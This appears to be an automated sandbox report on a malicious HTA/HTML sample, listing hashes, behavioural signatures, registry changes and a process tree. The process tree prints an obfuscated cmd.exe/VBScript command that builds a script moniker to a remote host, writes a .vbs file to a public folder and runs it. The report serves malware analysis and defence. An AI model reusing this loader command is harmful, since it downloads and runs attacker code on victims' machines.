Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
141s -
max time network
272s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
23/01/2024, 09:55
Static task
static1
Behavioral task
behavioral1
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
Resource
win10v2004-20231215-en
General
-
Target
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html
-
Size
7KB
-
MD5
f3ab9f8fe8995462c3245f10ed76ae4f
-
SHA1
6aa8e54760bcc9aa7402e75d7cb33011e0673f7f
-
SHA256
2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987
-
SHA512
68d097848803e6c9f009ee41da373b5ce1136e40c750c0c704a137ca1a11bd483dc1f06089e9eb9310b47ee7232ac6bc8ad6c302bbe064765f266efef579848b
-
SSDEEP
192:CzHyJ1AwYaKyJ0VmW98+n6z39EPHzyKQSOOUHdLqmTlphHBLmBdexU+4ur6kUjRd:CzyJ1pROT
Malware Config
Signatures
-
Blocklisted process makes network request 6 IoCs
flow pid Process 20 1196 WScript.exe 22 1196 WScript.exe 24 1196 WScript.exe 73 2492 WScript.exe 74 2220 WScript.exe 78 3512 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412768764" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{AD16296B-B9D5-11EE-B7F4-CE055DF4442A} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31084002" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31084002" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 30579383e24dda01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2172942066" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d228e40a7820b94dbd5c7b6846f2f5ad00000000020000000000106600000001000020000000672d7aec16a565e39287115a3db796534019db4a577fa1539fd832d5cf8df404000000000e80000000020000200000002e83f0726114578e20aacaf9211e76769335d12733d542e47eab83dfa0f1cbf62000000061690623d60e588e343864d07ee28cb4d11578ead22e70c1c9bfc82657b1930a400000001d5f0f96c833dfdce3dee6ad7ba9bd2c32a1ace645e20c1250a0c45e73a8029fdafaf0b7435f62a0b77907dff48775a976e19c63d3ffd49295d2967798408379 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2192630677" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2172785985" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31084002" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70a77683e24dda01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d228e40a7820b94dbd5c7b6846f2f5ad00000000020000000000106600000001000020000000ecad7d4bcadaa78b51cf7ce6032b668848359d70b92d0f13a79ace3074666548000000000e8000000002000020000000db4ed6901207a365a9156c4a15edd163a07af281910663c3e51eed128f1ab96320000000a7843299a4d63d6a150bc5487ed29ed2d0c346d45e9d4bc8cd0edaa6f20f8e7040000000cee88215017d5351b140fc1215f04eb85dd4cc2d3b7782731177214b15d11e36fcf5b63c3e05c4b2910cdacc168411ed418809da05b4f2304b184348e8856213 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings cmd.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1116 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1116 iexplore.exe 1116 iexplore.exe 1664 IEXPLORE.EXE 1664 IEXPLORE.EXE 1664 IEXPLORE.EXE 1664 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1116 wrote to memory of 1664 1116 iexplore.exe 85 PID 1116 wrote to memory of 1664 1116 iexplore.exe 85 PID 1116 wrote to memory of 1664 1116 iexplore.exe 85 PID 1664 wrote to memory of 4452 1664 IEXPLORE.EXE 93 PID 1664 wrote to memory of 4452 1664 IEXPLORE.EXE 93 PID 1664 wrote to memory of 4452 1664 IEXPLORE.EXE 93 PID 4452 wrote to memory of 4692 4452 cmd.exe 95 PID 4452 wrote to memory of 4692 4452 cmd.exe 95 PID 4452 wrote to memory of 4692 4452 cmd.exe 95 PID 4692 wrote to memory of 1196 4692 cmd.exe 96 PID 4692 wrote to memory of 1196 4692 cmd.exe 96 PID 4692 wrote to memory of 1196 4692 cmd.exe 96
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\2d76ec94e8679b9c9d2eb0f0819c9a6d42ba9bcfa423416885dfc2b933735987.hta.html1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1116 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /V/D/c EcHo Z5ceEsS49="." : FunctIon Tji57(H27N20):NiF24 = Array(":","t","r","c","1"):Tji57 = NiF24(H27N20):end function :: fm6fciL34 = "S"+ Tji57(3) +"rip"+ Tji57(1) + Tji57(0) + "hT"+ Tji57(1) +"ps://contdlk"+Z5ceEsS49+"bounceme"+Z5ceEsS49+"net/g1":eval("Ge"+ Tji57(1) +"Obje"+ Tji57(3)+ Tji57(1) +"(fm6fciL34)") > nul > C:\Users\Public\^dmpRBh785.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs3⤵
- Suspicious use of WriteProcessMemory
PID:4452 -
\??\c:\windows\SysWOW64\cmd.exec:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\dmpRBh785.vbs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"5⤵
- Blocklisted process makes network request
PID:1196
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:2572
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4520
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"1⤵
- Blocklisted process makes network request
PID:2492
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"1⤵
- Blocklisted process makes network request
PID:2220
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\dmpRBh785.vbs"1⤵
- Blocklisted process makes network request
PID:3512
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
503B
MD590d448a2f391f2bf12a7b35d151ce5b2
SHA13cc7700072fb2ab2629342e8721027264664353d
SHA25633c0cd4442f938503fe9f29ef0014748b9f2dcf1ddd0c0c980a3cf9e412996f7
SHA512b9a7941b4815d27d32187c5e25a6d90496e10ee67ec32431489e569d11bb28cbdcb5cce7b93ebe540358d81015572b87727a06656341e05c608fcb2a6eaf2d49
-
Filesize
717B
MD560fe01df86be2e5331b0cdbe86165686
SHA12a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5f3990afbcdf64f1f806d1b926cf35b3d
SHA1da1297f9ac1e9e9e7e78b567006e9248bfc212f7
SHA25648c214dd545cc2718f7e844d699efae28f80d683340959e000bb41ad75dd6386
SHA5129b5bc750b2e1038c82a93d51efe0d7dcf951ca594a62a90bac0ca1019d232afd07f9630e1ba1b609e128a9ba9c23c1ea8f1badd9e6b25f3eb591a936c89ee939
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\085BE1489149EBA229862B6B37CD44C6
Filesize552B
MD5e3a9ad9ac69b75150e001a4abedb47c0
SHA1394b4337d367a7c062ddccf35c8e2dfff3dece3c
SHA2563b882ad2e26dbfd6de12105b2396285f86ac4bd7b3c7f0b98c8721daf9ba6d6f
SHA5125d6b43d9447306e7545cb0b11e56496058eeffee7fce8c877c2dc8ad139c13901b5646b3e5074d4cffb1a36e2a5c24924a22ac0a27696d018633bbe098f7df57
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD592f8ba8509c99cebe120ef711fb0a15c
SHA1011ab94f430d05573a3ff95f91c82dbf04fa5429
SHA25610d737e1adef6e35aa7f92ebc1f51538ee60cce3256466d1788432b01084d0aa
SHA512785331ea350ae533f851b78f7ac42662c2d8a2373603d6ae15e3f745ce433f54abb9ac7782ca2b9708235c1b4185d1a74ea553ba86894e2916866aafaf2811ee
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5debffbbe5a9ec3e80a70a8729bfb794f
SHA1ef8ba66731686933c5de40c9be26894cf0bf265b
SHA256604eb7dc9ea9e5a9bc2d069013ce084ac88a5103b142363ddd8186f5fef72a2f
SHA512a0a67712c478f2dfa28bb3528409d81368d6a5500939eedb0663fcd62e970f7905309643289bde00a53917f755afafe7998aa54a3c5e2f01e026ee38dafec7aa
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
26KB
MD579b44082ac9bee1660a2e529e6497034
SHA11a687cdf1814311c4ac41dc08c5ae387785c9068
SHA256999fb1cfc58112cb5e4918073a48bbfcfba2c908e28ca10e867cb37f54699661
SHA512e0b3d2a17f8939e3a7567a2d37c3d5d91f226728b77499fc6e2626770295f03550df2f0a197ee211e2979ee194e0d6e8cea8b01fee34fd4c0f722af0c4f9e766
-
Filesize
27KB
MD54ba9037d9824c60f16a03c8e845cb03e
SHA1668efd3cdd4ed3676b93c78c0de5d030a5023aed
SHA256bce24c89d54f41488590cbc1c7d484408406e466f6901d70730f0a1b36864e1f
SHA512be7867da66a95a9193e8f0fef31a7b2a20dee3f6db1964d8bdbc2d35d67c7c513a4fd1fe5ff398052b33eb84ab397493f3d752c851be200c3c2422fc66eb3b84
-
Filesize
26KB
MD531b5e7952b619ad4da2ed1306501ad4c
SHA19fc21d985d83fc77516be614f09f59f0cf329138
SHA25697fe259208d31a315d54ad36b4020f69bfbc7cb46d8eb31a74ff2eb498c08381
SHA5121c77ebfa5e9587ec4bea2769ae12325d1de7076d48bdc6a8a9f5cf7534e251fb7dc4bd1540ae89806950dcffd8db000f9bbec7e0f768549d617561123bd9cd88
-
Filesize
327B
MD5fd2efbdbb30ede4f38e15e84d364f2cd
SHA17367e6401f540890d1ec7cc959d8b752cd4e6864
SHA25659fe5fc6b1a92a3744bb252aa3f9cb4e925f8879b5c7783259ff322fc7b76ab8
SHA512d7523eda57da0fa7c03cd0fed7c05b6c28104cdc4858a34f8c0ddc84d9ff7c2a9b431d59d3109c8a96c40b7f20fe30de6d3585ba51e363cf37a14799a2f72357
-
Filesize
306B
MD5154b54da0532f06d78997442ad648d45
SHA11087a477ec4815eade97d338743ce63361e5f09b
SHA2564f72eeaf5d050f5077a82782d7dfbceed38448b1569836f8b0550dcd3080574d
SHA51264bc9c808251aa272352cef3d74620974f962fbc5d511474a8f8ea0393aa43a76a0ebf8b3877d5f3ccaa4b9c7e25c98793b0cad8928d68cc4a0a9bcc99c5fe2c